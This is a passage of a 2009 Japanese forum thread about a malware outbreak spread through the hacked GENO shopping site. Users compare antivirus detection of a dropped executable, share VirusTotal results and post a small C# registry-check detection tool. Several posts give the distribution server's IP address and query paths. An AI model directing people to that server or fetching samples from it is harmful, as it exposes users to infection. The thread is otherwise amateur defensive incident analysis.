331 ハナワギク(北海道):2009/04/07(火) 01:16:33.36 ID:mSg2gEOd
>>323
今ウチにいるのは
?id=100 html
?id=2 PDF
?id=3 SWF
なんですけれどもどうしたらいいんですか><
332 マムシグサ(dion軍):2009/04/07(火) 01:17:28.33 ID:Pgq7lh9W
>>320
うpしてくれるとありがたい
333 ハナビシソウ(関西地方):2009/04/07(火) 01:17:36.96 ID:HRQhxBob
よく考えてみたら俺が普段しないフラッシュアップデートをしたのはたまたまじゃなくて重大な脆弱性ニュース見たからだわ
お前らも自宅警備を怠らずニュースぐらいはチェックしとけよ

あと、このノリでavastに乗り換えようとしてるそこのアホ、avastマンセーってなってる馬鹿にはAvira Antivirをお勧めしておく
334 ウンナンオウバイ(神奈川県):2009/04/07(火) 01:17:46.33 ID:1Q8KJtny
>>173
※このアドレスは危険URLのひとつです。
危険!mailtoストームを発見! (1115)
335 コバノランタナ(千葉県):2009/04/07(火) 01:17:59.42 ID:hD4R3NI8
>>331
リカバリするか、とっととクリーンインストールしたほうがよいよ。
336 オオバクロモジ(福岡県):2009/04/07(火) 01:18:48.83 ID:4QfY/bda
>>329
使い方も書いてないし怪しくて手だせなくね・・・
337 メギ(東京都):2009/04/07(火) 01:19:55.28 ID:SNZhFgrd
http://takeshima.2ch.net/test/read.cgi/news4vip/1239019678/

vipどうなってるか見たらひどいことになってる
スレタイも読めないひどいのがいっぱい
338 オキナワチドリ(岩手県):2009/04/07(火) 01:20:12.83 ID:yOFciNDi
>>333
セキュ板臭い
339 キクザキイチゲ(福岡県):2009/04/07(火) 01:21:12.83 ID:8Doz9pYt
340 ガーベラ(鹿児島県):2009/04/07(火) 01:21:45.64 ID:n6STd+4C
再起動ウィルス以来の恐ろしいのが来たなwwwwwwwwwwwwwwwwwwww
341 ハナワギク(北海道):2009/04/07(火) 01:22:07.86 ID:mSg2gEOd
今日、HDD買ってきてファイル保存退避させてからクリンインスコするしかないのかねえ。

>>338 セキュ板だったら黙ってNOD32じゃね。
342 フリージア(東京都):2009/04/07(火) 01:22:28.28 ID:aQV3b+FB
?id=100にVistaでアクセスした人は2回目以降XPでアクセスしてもクッキー書き込みのスクリプトしか返さないらしいよ。
IPアドレスとユーザエージェントをサーバ側で管理してるらしい。
逆に、初回にXPでアクセスした人は、次にVistaでアクセスしても?id=2と?id=3への誘導コード入り。
つまりVistaでも感染の可能性あり。
343 オウレン(埼玉県):2009/04/07(火) 01:22:37.34 ID:J9fZ7s49
リンク取得した時点で駄目なのか
さすがavast
344 水芭蕉(中部地方):2009/04/07(火) 01:22:49.30 ID:aRhF2J1+
>>339
悪用しちゃう(´・ω・`)
345 ストック(愛知県):2009/04/07(火) 01:23:22.52 ID:vwosJmBt
全然関係ないけど昔ブラスターワームってのがあったよな
ただ再起動するだけだったけど当時はびびったもんだ
346 ベゴニア・センパフローレンス(愛知県):2009/04/07(火) 01:23:39.84 ID:ed3Zrgfv
Avira Antivirマダ対応してないんだろ
いくらなんでもうんこすぎんだろ
347 オウギカズラ(愛媛県):2009/04/07(火) 01:23:42.29 ID:xDNKs7PO
>>339
これが元のウイルスなのか?
348 オニノゲシ(大阪府):2009/04/07(火) 01:23:47.67 ID:cammyN+/
バルト三国め
349 キランソウ(福岡県):2009/04/07(火) 01:24:13.49 ID:01FCm4gy
適当に改行

using System;
using System.Collections.Generic;
using System.Text;
using Microsoft.Win32;

namespace geno{
class Program{
static void Main(string[] args){
Console.WriteLine("GENOウイルス検査ツール\n");
RegistryKey regkey = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32");

if (regkey != null){
string tes = (string)regkey.GetValue("aux");
if (tes == @"%System%\..\bpagokx.nmy"){
Console.WriteLine("感染の可能性があります");
}
else{
Console.WriteLine("感染の形跡はありません");
}
}
else
{
Console.WriteLine("regkey not found");

}
Console.ReadLine();
}}}
350 ヒマラヤユキノシタ(福岡県):2009/04/07(火) 01:24:59.28 ID:vdumWT6M BE:150471825-PLT(12190)

>>333
布教したいならどこがどう良いのか解説しろよ
351 ニリンソウ(福岡県):2009/04/07(火) 01:25:16.51 ID:RbWqx5rG
エクセルデータとかは無事なのかね?
352 オウギカズラ(愛媛県):2009/04/07(火) 01:25:30.84 ID:xDNKs7PO
あれwAvastでLa.exe検出されなくね?
353 コバノランタナ(千葉県):2009/04/07(火) 01:25:36.42 ID:hD4R3NI8
>>339
中のEXEはノートン先生反応しないね。
取り扱い要注意。

でUPX圧縮されててアンパッカーインスコしてないからこれ以上追えないわ。
おいらは終了。
354 セントランサス(東京都):2009/04/07(火) 01:26:32.78 ID:6+I7Hgko
何だかわからんが、伝家の宝刀ウイルスセキュリティ ゼロを入れてる俺には無縁な話か
355 ダンコウバイ(北海道):2009/04/07(火) 01:26:48.19 ID:ZewDQZ4A
何したら良いのか分からん
356 フリージア(東京都):2009/04/07(火) 01:27:04.56 ID:aQV3b+FB
>>339
パスきぼんぬ
357 ハナビシソウ(関西地方):2009/04/07(火) 01:27:29.64 ID:HRQhxBob
春厨かよ
358 水芭蕉(中部地方):2009/04/07(火) 01:27:46.00 ID:aRhF2J1+
落としたみたがバカフィーまったく反応しねえ
359 オウギカズラ(愛媛県):2009/04/07(火) 01:28:19.52 ID:xDNKs7PO
>>358
Nortonも反応しない。なんでだろ
360 プリムラ・ヒルスタ(富山県):2009/04/07(火) 01:28:32.03 ID:3AlrDAYx
同じくAVG反応せず
361 アルストロメリア(愛知県):2009/04/07(火) 01:28:35.78 ID:PpAfGl6U
>>358
バカフィーとかいうな バカフィー様といえ
362 ミゾコウジュミチノクコザクラ(関西地方):2009/04/07(火) 01:28:38.46 ID:e12iyH9b
>>339
カスペ2009も反応しない
363 ハナビシソウ(関西地方):2009/04/07(火) 01:28:51.59 ID:HRQhxBob
ちなみにAvira無反応
364 コバノランタナ(千葉県):2009/04/07(火) 01:29:05.16 ID:hD4R3NI8
あ、バイナリエディタでUPX圧縮済みのを見ても
スレの最初のほうで報告があったu.batの文字列が書かれてる。
365 キンケイギク(アラバマ州):2009/04/07(火) 01:29:13.31 ID:+W+mjgtI
デフラグ何度してもCドライブ全部真っ赤なままなんでさっきリカバリした。
GENOが原因かは不明だが踏む前はなんともなかった。
366 ヘビイチゴ(静岡県):2009/04/07(火) 01:29:58.68 ID:Fe1RTXma BE:1169020984-PLT(16543)

>>303
577 名前: キバナスミレ(関東・甲信越)[] 投稿日:2009/04/05(日) 17:42:12.62 ID:vha5s7Cg
>>570
アクセスしたらマウスの動きが重くなったんで、おかしいなと
そんでnetstatコマンド打ったら94.247.2.195と通信してた
そしたらコマンドプロンプトが突然落ちた
その後タスクマネージャ見たらconime.exeが動いてた
367 キンケイギク(アラバマ州):2009/04/07(火) 01:30:30.20 ID:+W+mjgtI
良いバックアップツール探してる 入れ忘れたソフトが多くて思い出せないわ
368 ヒメスミレ(dion軍):2009/04/07(火) 01:30:53.64 ID:tEaYs6hO
>>339 ぱす何教えろ?
369 ノゲシ(滋賀県):2009/04/07(火) 01:30:57.41 ID:LDsW9EA+
そんでnetstatコマンド打ったら94.247.2.195と通信してた
そしたらコマンドプロンプトが突然落ちた
その後タスクマネージャ見たらconime.exeが動いてた

ネタだろ
370 アルストロメリア(愛知県):2009/04/07(火) 01:31:07.40 ID:PpAfGl6U
>>366
conime.exeなんて毎日動いてるだろ
371 オキナワチドリ(岩手県):2009/04/07(火) 01:31:11.54 ID:yOFciNDi
>>339
BitDefender反応なし
372 アヤメ(アラバマ州):2009/04/07(火) 01:31:28.91 ID:bkbnravR
>>339
Antivir 7.01.03.20
AVAST! 090406-01
スキャンしても無反応です なんで?
373 キランソウ(福岡県):2009/04/07(火) 01:31:29.40 ID:01FCm4gy
>>367

232 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/04/07(火) 01:23:57
リカバリして帰還したが入れてないソフト重いだせん・・・
374 キンケイギク(アラバマ州):2009/04/07(火) 01:32:04.55 ID:+W+mjgtI
ああ思い打線のだよ。
375 オウギカズラ(愛媛県):2009/04/07(火) 01:32:06.36 ID:xDNKs7PO
ということは、La.exeは反応しないからあぶないなあ。どういう動きするファイルかは知らないけど。
376 水芭蕉(中部地方):2009/04/07(火) 01:32:08.78 ID:aRhF2J1+
vipからのお客様が混ざってるみたいですね。巣に持ち帰って
ばら撒く気か?
377 キクザキイチゲ(福岡県):2009/04/07(火) 01:32:14.06 ID:8Doz9pYt
ちなみにLa.exeをvirustotalにうpった結果はこう出た
http://www.virustotal.com/jp/analisis/d2ab3fb2e35d6cc5aaae32e7230a4646
378 ハナワギク(北海道):2009/04/07(火) 01:32:29.19 ID:mSg2gEOd
>>371
それは軽くショックを受けるな。
379 ベゴニア・センパフローレンス(愛知県):2009/04/07(火) 01:32:49.23 ID:ed3Zrgfv
もう消しとけばいいんじゃないかな
380 オオバクロモジ(catv?):2009/04/07(火) 01:33:27.87 ID:5Nd8UKQv
キーワードが正しくありません
381 ヤエヤマブキ(福岡県):2009/04/07(火) 01:33:30.66 ID:pgsxCmAv BE:1110097499-2BP(8000)

>>339
avast反応なし
382 コバノランタナ(千葉県):2009/04/07(火) 01:33:38.59 ID:hD4R3NI8
>>368
ν速のお約束パス。
昔のここの鯖名をテキトーに入れてみそ。
383 カンパニュラ・サキシフラガ(関西地方):2009/04/07(火) 01:34:12.45 ID:smdLnKb7
>>371
ちゃんとアップデートしたか?
384 キクザキイチゲ(福岡県):2009/04/07(火) 01:34:26.82 ID:8Doz9pYt
385 水芭蕉(中部地方):2009/04/07(火) 01:34:33.18 ID:aRhF2J1+
ここまで反応ありのソフト無しかよ。つーか有名どころ全滅?
386 タツタソウ(長屋):2009/04/07(火) 01:34:42.62 ID:6QT6OWSq
>>345
PC壊れたから新しいの買ったんだけど
ネットに繋いだ途端に入ってきて困ったよw
387 ボタン(静岡県):2009/04/07(火) 01:34:53.44 ID:4m6ksm3L
いまさらながら
>>257
thx
388 キンケイギク(アラバマ州):2009/04/07(火) 01:34:57.46 ID:+W+mjgtI
PCの新品激安 スレでGENO見てみろって書かれて知らずに踏んだ。
激安PCあるのかと
389 アヤメ(アラバマ州):2009/04/07(火) 01:35:02.34 ID:bkbnravR
でもメモリは確実に食ってWindowsはモッサリする

これって全然解決してないんじゃないか?w
390 アルストロメリア(愛知県):2009/04/07(火) 01:35:09.83 ID:PpAfGl6U
>>384
怖くて踏めない 誰か踏んで
391 キランソウ(福岡県):2009/04/07(火) 01:35:10.73 ID:01FCm4gy
>>377
まかふぃーの本気はじめて見たw
392 オウレン(埼玉県):2009/04/07(火) 01:35:30.94 ID:J9fZ7s49
おまえらクリーンインスコ位いつでも出来る環境にしとけよ
何騒いでるんだ
393 トウゴクミツバツツジ(関西地方):2009/04/07(火) 01:35:33.48 ID:uHoLpCgS
394 ミヤコワスレ(兵庫県):2009/04/07(火) 01:35:37.16 ID:AeFWlFj7
たった今2回目のクリーンインスコ\(^o^)/オワタ
もう踏まないw
395 サトザクラ(dion軍):2009/04/07(火) 01:35:37.44 ID:ly823CjS
>>390
ただの画像
396 コバノランタナ(千葉県):2009/04/07(火) 01:35:57.83 ID:hD4R3NI8
>>391
いままで馬鹿にしてたけど、ちょっと見直したわw
397 ベゴニア・センパフローレンス(愛知県):2009/04/07(火) 01:35:59.25 ID:ed3Zrgfv
5つしか対応してないとか流石におわてる
398 アルストロメリア(愛知県):2009/04/07(火) 01:36:00.56 ID:PpAfGl6U
>>395
信じていいんだね?
399 オウギカズラ(愛媛県):2009/04/07(火) 01:36:36.89 ID:xDNKs7PO
>>390
DOSに、

GENOウイルス検査ツール

感染の形跡はありません。

って表示されてる画像
400 ハマナス(dion軍):2009/04/07(火) 01:36:37.48 ID:sJqgZaPV
>>395
精神的ブラクラだって、ただの画像だ。
401 アルストロメリア(愛知県):2009/04/07(火) 01:36:43.71 ID:PpAfGl6U
>>377
バカフィーとかいってごめんね
402 水芭蕉(中部地方):2009/04/07(火) 01:36:52.48 ID:aRhF2J1+
>>390
単なるろだだろ
403 キクザキイチゲ(福岡県):2009/04/07(火) 01:36:56.18 ID:8Doz9pYt
あ、削除パス忘れたw
404 マムシグサ(dion軍):2009/04/07(火) 01:37:26.38 ID:Pgq7lh9W
>>339
ありがとう
?id=10で何度か落としてみたけどLa.exe以外にも
Gml.exeとか6x.exeとかで落ちてきたから
名前はランダムで決まるっぽいな

VirusTotalで.exeを検知できるのは以下の6つだけ

eSafe 7.0.17.0 2009.04.06 Suspicious File
McAfee 5576 2009.04.06 Generic Dropper.ef
McAfee+Artemis 5576 2009.04.06 Generic Dropper.ef
Prevx1 V2 2009.04.06 High Risk Cloaked Malware
Symantec 1.4.4.12 2009.04.06 Trojan.Dropper
TrendMicro 8.700.0.1004 2009.04.06 PAK_Generic.001

ノートンで検知しない人はデイリーdat入れてみたら?
405 ヤグルマギク(西日本):2009/04/07(火) 01:37:44.37 ID:MnpB7Y/o
前967で上げた短縮URL集をビミョーに修正しました。
修正後の方を使って下さい。

修正前 http://www.katsakuri.sakura.ne.jp/src/up39423.txt
修正後 http://windyakin.if.land.to/src/up38_1142.txt

修正前の方は後で消しておきます
406 フリージア(東京都):2009/04/07(火) 01:38:04.27 ID:aQV3b+FB
94.247.2.195/news/?id=10
ここから拾ったexeも反応なしだ > ESET
2回目以降exeが落ちてこなくなった(ノ∀`)
407 ヤエヤマブキ(福岡県):2009/04/07(火) 01:38:28.36 ID:pgsxCmAv BE:383737474-2BP(8000)

>>339
ファイル保存しなくて良かった・・・・・
408 ボタン(アラバマ州):2009/04/07(火) 01:41:08.49 ID:paLqG5K8
英語出来るならESETに検体送ってやれ
409 タネツケバナ(新潟県):2009/04/07(火) 01:41:09.24 ID:06Ad6Iwx
>>75
どうやら感染していなかった
これ感染してた場合なんて出るん?
410 キクザキイチゲ(福岡県):2009/04/07(火) 01:42:14.74 ID:8Doz9pYt
>>404
過去スレにも出てきたここ
http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p5.html
にあるとおり、.exeの前はランダムだね。
411 コバノランタナ(千葉県):2009/04/07(火) 01:42:23.74 ID:hD4R3NI8
とりあえずバイナリエディタで開いたla.exe内のu.batの文字列
赤枠で囲ってる中に書かれてる。
なんか分岐処理してその結果実行されるんだと思う。

ttp://up2.viploader.net/pic/src/viploader970514.jpg
412 フリージア(東京都):2009/04/07(火) 01:43:30.61 ID:aQV3b+FB
>>408
?id=10のexeと?id=2のPDFは送っておいた
413 エビネ(北海道):2009/04/07(火) 01:43:45.79 ID:kxKVEndS
怖くて全部踏めないわ
414 アルストロメリア(愛知県):2009/04/07(火) 01:43:47.07 ID:PpAfGl6U
マカフィー入れててよかっただなんて初めて思った
415 クワガタソウ(神奈川県):2009/04/07(火) 01:43:54.82 ID:fmDYSjVa
avira7.1.3.21更新きた
前スレか前々スレあたりの人の話が本当ならこれで対応された?
416 コバノランタナ(千葉県):2009/04/07(火) 01:44:09.15 ID:hD4R3NI8
あ、IF EXISTだからu.batの存在の有無をチェックしているのかも知れないわ。
これ以上はおいらわかんない。
417 ミゾコウジュミチノクコザクラ(関西地方):2009/04/07(火) 01:44:13.45 ID:e12iyH9b
>>393
カスペに検体送っといた
418 カンパニュラ・サキシフラガ(大阪府):2009/04/07(火) 01:44:50.47 ID:xLJJRuyw
>>173って専ブラでプレビューしても死亡?
419 水芭蕉(中部地方):2009/04/07(火) 01:45:04.49 ID:aRhF2J1+
なんかお前らかっこいいぞ。閉鎖騒動の時のUNIXを思い出す
420 エイザンスミレ(長屋):2009/04/07(火) 01:45:17.70 ID:8Claia4S
なになにavast!は検知できないの?
421 ボタン(アラバマ州):2009/04/07(火) 01:46:11.57 ID:paLqG5K8
また閉鎖騒動起きないかな。
422 オウレン(埼玉県):2009/04/07(火) 01:46:18.02 ID:J9fZ7s49
>>418
自動取得設定してるならアウト
触れてもアウト
423 ヒサカキ(中国地方):2009/04/07(火) 01:48:32.91 ID:gcqhhmRp
こりゃぁえらい被害だなwwwww
424 スノーフレーク(長屋):2009/04/07(火) 01:49:00.05 ID:usC13Lh1
マイクロトレンド(ウイルスバスター2009)で、
2009/04/06の更新したけれど。

prnファイルのプリントソフトを誤検出してないか?
処理されちまったファイル、どうやって戻すんだよ。
425 トウゴクシソバタツナミ(catv?):2009/04/07(火) 01:49:06.24 ID:dyBCfAKh
>>422
触れてもアウトってニトログリセリンみたいなウイルスだな
426 キンケイギク(茨城県):2009/04/07(火) 01:49:14.63 ID:qBKuVinG
なんで閉鎖しないの?
狂ってるの?
427 マムシグサ(dion軍):2009/04/07(火) 01:49:20.34 ID:Pgq7lh9W
>>415
.jsと.pdfには対応してるが、
.exeと.swfには未対応
自分はPersonalなのでProfessionalで対応してるかとは分からん
428 クワガタソウ(神奈川県):2009/04/07(火) 01:49:39.85 ID:fmDYSjVa
最新avira>>339反応しないや とおもったけど他のも反応しないのか
jsファイルに反応するってことか
429 コバノランタナ(千葉県):2009/04/07(火) 01:50:07.94 ID:hD4R3NI8
>>420
恐らく、あくまで仮説だけど、
現状の各セキュリティソフトメーカーは
みんな書き換えられたjQuery.js内のid=ほにゃららの文字列だけをチェックしてウィルス判定しているだけで、
単にこのexeファイルに関しては全然チェックしていないってだけだと思うよ。
恐らく検体提出されて数日以内に即効で検出される様に対処されると思うけど。
430 クロッカス(東日本):2009/04/07(火) 01:50:21.83 ID:v2pFr5JY
>>339
avira,avg,avast送付済み
431 カントウタンポポ(関東・甲信越):2009/04/07(火) 01:50:26.51 ID:2iC5vGDl
バイオハザードみたいだ
432 クワガタソウ(神奈川県):2009/04/07(火) 01:50:27.04 ID:fmDYSjVa
>>427
なるほど、そういうことだったのね
433 サトザクラ(中部地方):2009/04/07(火) 01:50:36.10 ID:ZJW91wqW
なんでGENOは何も対応しないんだよ
マジで教えてくれよ
434 コバノランタナ(千葉県):2009/04/07(火) 01:51:26.27 ID:hD4R3NI8
>>427
あ、PDFにも対応済みなんだ。>>429の件、一部訂正。
435 キンケイギク(茨城県):2009/04/07(火) 01:51:46.37 ID:qBKuVinG
これどこの会社なの?

社長シナか韓国人なの?
436 モリシマアカシア(東京都):2009/04/07(火) 01:52:04.44 ID:fhtlRrYZ
外部に作ってもらって対策できるスキルがないんでしょ
と、言う事だったらwebページ作った会社と鯖缶してる方の責任になるのかね
437 オオバクロモジ(catv?):2009/04/07(火) 01:52:49.70 ID:5Nd8UKQv
>>415
華麗にスルーしてるw
438 アルストロメリア(愛知県):2009/04/07(火) 01:52:51.64 ID:PpAfGl6U
村岡SEXYウイルスの被害はひどいな
なによりもGENOの対応が酷い
439 モッコウバラ(アラバマ州):2009/04/07(火) 01:53:35.67 ID:pSxEOveO
まだ直ってないのかよw
もう火曜日だぞ
440 サトザクラ(関西地方):2009/04/07(火) 01:53:47.14 ID:gVHhPofa
とりあえずpeerguardianにIP登録しといた
ログ眺めてもアクセスしてる形跡はない
antivir,comodo使用、WinXPで最新にしてる

ゲノはNECノート祭り以降は踏んでないと思うけど不安
いつから問題発生したんだ?
アンチウイルスでどのディレクトリをスキャンしたらいいかも教えて
441 ストック(愛知県):2009/04/07(火) 01:53:55.06 ID:vwosJmBt
つーかこれGENOの担当のPCも死んでて鯖だけが動いてるってことはないよな
442 パンジー(コネチカット州):2009/04/07(火) 01:54:02.89 ID:D2Opdrnq
携帯でもアウトなん?
ごろごろしながらしてて洒落にならんとかいやぜら
443 アルストロメリア(愛知県):2009/04/07(火) 01:54:15.41 ID:PpAfGl6U
>>440
今月の四日から
444 モリシマアカシア(東京都):2009/04/07(火) 01:54:49.71 ID:fhtlRrYZ
>>440
4月4日とかなんとか
まだ内容詳細わかってないらしい
445 水芭蕉(中部地方):2009/04/07(火) 01:55:15.71 ID:aRhF2J1+
なんでログ読まねえんだよ。どっから来てるか知らないがいちいち
毎回最初から説明しないといけないのか?
446 アルストロメリア(愛知県):2009/04/07(火) 01:55:19.95 ID:PpAfGl6U
マカフィーのフルスキャンが96%から進まん
447 ヤエヤマブキ(福岡県):2009/04/07(火) 01:56:19.31 ID:pgsxCmAv BE:863409479-2BP(8000)

>>442
携帯に被害及ばすウイルスって今から多くなるかもな
448 トキワヒメハギミツバアケビ(愛知県):2009/04/07(火) 01:56:24.02 ID:QpUgyCdr
u.batが無いけど、cmdが立ち上がらん
アプリが全部落ちる
なぜだ?
449 ヤブヘビイチゴ(栃木県):2009/04/07(火) 01:56:24.53 ID:4Ho9PgV+
のちのスカイネットである
450 タネツケバナ(新潟県):2009/04/07(火) 01:56:28.86 ID:06Ad6Iwx
>>422
マジで?プレビューしちゃったよ
でも>>75でチェックしても感染してないんだけど
>>75は釣りかよ
451 タツタソウ(長屋):2009/04/07(火) 01:56:30.07 ID:6QT6OWSq
セキュ板など色々な場所にこのスレ貼られてるからな
452 マムシグサ(dion軍):2009/04/07(火) 01:56:52.38 ID:Pgq7lh9W
>>427
自己レス
?id=3で得られる.swfは関係ないかも
virustotalでもonline malware scanでも検知されない
再生してみたけど真っ黒で何も映らない
453 ハチジョウキブシ(埼玉県):2009/04/07(火) 01:56:58.46 ID:8j+nYQj9
5時間ぶりにきたが動きあった?
454 カラタネオガタマ(関西・北陸):2009/04/07(火) 01:57:22.84 ID:OD8lLJOX
マカフィー様々のフルスキャンですら検知しないから安心していいよな
そもそもふんでないけど
455 イヌガラシ(アラバマ州):2009/04/07(火) 01:57:54.72 ID:8aJXSwgn
>>156
よう、村岡じゃないか!
456 クロッカス(東日本):2009/04/07(火) 01:57:54.81 ID:v2pFr5JY
Avast!入れておけばURLに接続できないからやってみ。
457 コバノランタナ(千葉県):2009/04/07(火) 01:58:14.03 ID:hD4R3NI8
>>453
ただ今スレ内の有志でウィルス解析中。。。
458 キランソウ(福岡県):2009/04/07(火) 01:58:20.03 ID:01FCm4gy
>>436

398 名前: コハコベ(千葉県)[] 投稿日:2009/04/06(月) 02:24:55.81 ID:RAsn9HbR
>>370
基本的に警察に書類送検されたりするのはあくまでサイト運営管理者側のゲノかと。

ただ、ここは実際にどういう契約になっているか知らないけど、
まともな企業が外注に仕事を投げる時はSLA(Service Level Agreement)と言って、
品質保証にまつわる契約を予め取り交わすんだよ。ま、その分契約金が高くなるけどな。

で、万一事前に取り交わした契約に盛り込まれた要求仕様にそぐわない物を納入したりすると
金銭的に外注企業から賠償を取れる契約を一緒に取り交わすんだよ。

だからそーいうまともな企業間契約を行っていると結局どっちにもツケがまわる。

ただ、恐らくここは保守更新契約まで含めて安くいー加減な契約をしてたと思うんで、
一方的にゲノが責任を負うケースになると思うよ。
459 ウィオラ・ソロリア(鳥取県):2009/04/07(火) 01:58:41.45 ID:Lt2HjeXf
今avastでやってみたけど、検出しなかった。
結局どうなんだ?
460 アルストロメリア(愛知県):2009/04/07(火) 01:59:08.69 ID:PpAfGl6U
>>454
検出した項目 2 オワタ きっと別のスパイウェアとかウイルスとかだとおもうが
今終わった 対応する必要はないとでた 
461 エイザンスミレ(長屋):2009/04/07(火) 01:59:12.66 ID:8Claia4S
>>429
あと数日ね
様子見てみる
462 ハルジオン(コネチカット州):2009/04/07(火) 01:59:44.13 ID:DYyD17c1
ESET送っておいた
463 アルストロメリア(愛知県):2009/04/07(火) 02:00:00.42 ID:PpAfGl6U
検出したのは二件ともマカフィーお得意のトロイの木馬だった
464 サイネリア(栃木県):2009/04/07(火) 02:01:24.06 ID:cc2QZmb2
もういい。一週間はPC起動しないわ
465 カラタネオガタマ(関西・北陸):2009/04/07(火) 02:01:54.89 ID:OD8lLJOX
>>460
もしかしてGENO踏んだのにそうでたのか?
466 ジギタリス(東京都):2009/04/07(火) 02:02:11.10 ID:74MmVZko
467 ミヤマアズマギク(関西地方):2009/04/07(火) 02:02:35.00 ID:E1uIbHZz
情強気取りがあたふたしてるのは笑えるな
468 アルストロメリア(愛知県):2009/04/07(火) 02:03:22.18 ID:PpAfGl6U
>>465
いや、俺の過去のレスを読んでくれるとわかるけど、俺に感染時の具体的症状はでてないんだ
469 ゲンカイツツジ(長屋):2009/04/07(火) 02:03:29.52 ID:iaH3XBff
ゲノの謝罪なしですか?
470 エビネ(北海道):2009/04/07(火) 02:03:38.64 ID:kxKVEndS
再起動余裕でした
471 モッコウバラ(アラバマ州):2009/04/07(火) 02:03:39.79 ID:pSxEOveO
最近fc2のブログでもウイルスが流行っているな
472 フサアカシア(dion軍):2009/04/07(火) 02:03:43.30 ID:YRMRqyLg
>>33
見てavast入れてフルスキャンして
何も検出されてなければ

とりあえず無事でFAって事でいいの????

このスレでは何も踏んでないし・・・・・・・・・

それと
これから踏みに言って「踏むなボケ!?」って言われるかどうかは「運」ってことなの?

473 ハチジョウキブシ(埼玉県):2009/04/07(火) 02:04:15.09 ID:8j+nYQj9
>>457
解析できる猛者がいるのかなるなる
474 カラスビシャク(catv?):2009/04/07(火) 02:05:01.83 ID:zEoZBwqn
>300
愉快犯w
475 ハルジオン(コネチカット州):2009/04/07(火) 02:05:11.34 ID:MsYkq/Tq
ニュー速とGENOスレ以外どこも取り上げないな、ネットニュース何やってんだ
IT系巣窟のはてなですら見かけないし
476 アルストロメリア(愛知県):2009/04/07(火) 02:05:38.60 ID:PpAfGl6U
俺の5歳になる老人PCだと強いウイルスに感染したら きっと爆発すること必定なり
477 パンジー(コネチカット州):2009/04/07(火) 02:05:59.70 ID:D2Opdrnq
ざわ・・・ざわ・・・
478 コバノランタナ(千葉県):2009/04/07(火) 02:06:23.04 ID:hD4R3NI8
>>473
ちなみにおいらは猛者じゃないから詳細な解析は無理w
479 水芭蕉(中部地方):2009/04/07(火) 02:06:23.68 ID:aRhF2J1+
なぁ、自体が一段落したらまとめ動画作ったらおもしろくね?
ゲノの対応の悪さの宣伝にもなるし
480 プリムラ・ラウレンチアナ(アラバマ州):2009/04/07(火) 02:06:33.80 ID:SY3MWZSl
【ウイルス感染】GENOを語るスレ30【アクセス注意】
http://pc11.2ch.net/test/read.cgi/pc/1239004304/

297 名前:名無しさん[sage] 投稿日:2009/04/07(火) 02:00:13 0
まーたやってくれたwwww
http://2sen.dip.jp/cgi-bin/upgun/up1/source/up25750.jpg
481 シロウマアサツキ(西日本):2009/04/07(火) 02:06:37.09 ID:JF7RZ/Wo
>>315
くそワロタ
482 キクザキイチゲ(福岡県):2009/04/07(火) 02:06:43.97 ID:8Doz9pYt
>>452
どのidか忘れたけど一瞬真っ黒になったのはその.swfのせいか。
483 ハナモモ(宮崎県):2009/04/07(火) 02:06:53.35 ID:07SNJE2W
>>451
セキュ板は何のためにあるんだよ
484 ねこやなぎ(長屋):2009/04/07(火) 02:07:25.09 ID:Ej6qxMGK
ん?これAvastだろうがノートン先生だろうが対応できず、踏んだら確実に幹線してたってこと?
485 サイネリア(栃木県):2009/04/07(火) 02:08:47.12 ID:cc2QZmb2
だめだ寝る。
念のためにパソはスリープさせとくわ
486 ムラサキハナナ(東京都):2009/04/07(火) 02:09:01.34 ID:Lk+2QR6i
気づかずに短縮url踏んでたりすんのかなぁ・・・・
これ引っかかると目に見えて分かる感じ?
487 カラタネオガタマ(関西・北陸):2009/04/07(火) 02:09:54.48 ID:OD8lLJOX
>>468
じゃあ大丈夫じゃないのか?
488 クロッカス(東日本):2009/04/07(火) 02:09:54.82 ID:v2pFr5JY
>>486
お手元のアンチウイルスを信じなさい
489 クロッカス(関東・甲信越):2009/04/07(火) 02:10:06.54 ID:XsxsDO6g
規制中につき携帯から
たった今踏んだが、もう直ったんじゃなかったのか?
やたらCPU使用率が動くからバスターで検査したら見慣れない変なのがやたら検知されるぞ
ちなみにVISTAのホームプレミア
490 アルストロメリア(愛知県):2009/04/07(火) 02:10:42.21 ID:PpAfGl6U
>>487
でも別にウイルスが入ってるってことがわかって少し焦ったんだよ
トロイの木馬だったんで安心した
491 キンケイギク(茨城県):2009/04/07(火) 02:10:55.80 ID:qBKuVinG
ウイルス垂れ流しで販売続けてスルーとかw
492 パンジー(コネチカット州):2009/04/07(火) 02:11:42.51 ID:D2Opdrnq
>>447
不安を煽るような言い方マジでやめてくれ
493 ヤエヤマブキ(福岡県):2009/04/07(火) 02:11:43.15 ID:pgsxCmAv BE:616721459-2BP(8000)

>>483
一番頑張らなきゃいけない板だけどなぁ・・・・・w
494 ムラサキハナナ(東京都):2009/04/07(火) 02:11:54.02 ID:Lk+2QR6i
>>488
Avast先生入ってたけどとっくにライセンスがきれてたわ
これを気に再取得するか
495 サトザクラ(dion軍):2009/04/07(火) 02:11:56.48 ID:yzuD0UqT
>>486
踏んでGENO開いたけど、メンテ入ったところっぽくて
ブルースクリーンとかそういった症状は出ないな。
496 サトザクラ(関西地方):2009/04/07(火) 02:12:05.86 ID:gVHhPofa
a-squared使いやすくなってるな
昔はaイとか表示されて駄目駄目だったのに
497 ポピー(山形県):2009/04/07(火) 02:12:11.12 ID:vtWCNg49
NOD32はまだ対応して無いのか
498 クワガタソウ(神奈川県):2009/04/07(火) 02:13:18.69 ID:fmDYSjVa
現状だと各ウイルスソフトとも踏んで感染するのを食い止めるだけなんじゃ?
踏んでからウイルス検査しても意味無いような
499 パキスタキス(アラバマ州):2009/04/07(火) 02:13:44.10 ID:cM6/F+dw
もう相当数踏んでるから情報量も莫大になり過ぎて
仕込んだ側も解析しきれんだろうさw
短縮馬鹿はリスクを薄める為にやってんだろう
500 ナズナ(catv?):2009/04/07(火) 02:14:29.01 ID:d8KCzDbR
nod32は3990に更新されたけど、怖くて試せねえや
501 カントウタンポポ(関東・甲信越):2009/04/07(火) 02:17:34.79 ID:2iC5vGDl
情弱の俺はマカフィー先生が我が家のPCに問題無しとの判断を下してので寝る
たまたま数日GENOに行ってなくて助かったぜ
502 クモマグサ(愛媛県):2009/04/07(火) 02:18:45.57 ID:dlqb+X8n
kickback.cc/upload/stored/up10577.jpg
これjaneで踏んだんだけど大丈夫?
